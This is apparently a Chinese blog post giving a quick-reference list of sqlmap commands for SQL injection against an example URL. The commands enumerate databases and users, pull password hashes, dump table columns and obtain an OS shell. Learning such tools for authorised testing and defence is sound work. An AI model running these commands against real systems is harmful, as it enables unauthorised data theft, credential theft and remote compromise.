内容纲要
本文可直接wget得到,配合tmux使用体验更佳。(文章末尾)
./sqlmap.py –h     //查看帮助信息
 ./sqlmap.py –u “http://www.bigesec.com/inject.asp?id=injecthere”  //get注入
 ./sqlmap.py –u “http://www.bigesec.com/inject.asp?id=injecthere” --data “DATA”//post注入
 ./sqlmap.py –u “http://www.bigesec.com/inject.asp?id=injecthere” --cookie “COOKIE”//修改请求时的cookie
 ./sqlmap.py –u “http://www.bigesec.com/inject.asp?id=injecthere” --dbs   //列数据库
 ./sqlmap.py –u “http://www.bigesec.com/inject.asp?id=injecthere” –-users //列用户
 ./sqlmap.py –u “http://www.bigesec.com/inject.asp?id=injecthere” –-passwords //获取密码hash
 ./sqlmap.py –u “http://www.bigesec.com/inject.asp?id=injecthere” –-tables  -D DB_NAME //列DB_NAME的表
 ./sqlmap.py –u “http://www.bigesec.com/inject.asp?id=injecthere” –-columns –T TB_NAME -D DB_NAME  //读取TB_NAME中的列
 ./sqlmap.py –u “http://www.bigesec.com/inject.asp?id=injecthere” –-dump –C C1,C2,C3 –T TB_NAME -D DB_NAME //读字段C1,C2,C3数据
 ./sqlmap.py –u “http://www.bigesec.com/inject.asp?id=injecthere” –-os-shell  //取得一个shell
https://bear962464.cn/2019/10/27/640/

2019 c clang css css3 kali linux nmap python QQ QQ微信微博 termux termux命令 termux帮助 tmux使用帮助 Twenty Fifteen Twenty Twelve windows wordpress WordPress显示文章摘要 京东养红包 优化 作者权限 关于未来智能设备的思考 养红包 动态背景 厘米换算英尺英寸 发表 喵币 小米手环2 小米手环4NFC 插件 期刊 然后是几点 爬虫 特效 畅想智能设备 登录 社会化登录 笔记 答案 美化 蜘蛛网 逆序的三位数 透明

最后修改日期:2019年10月28日

作者

留言

撰写回覆或留言

发布留言必须填写的电子邮件地址不会公开。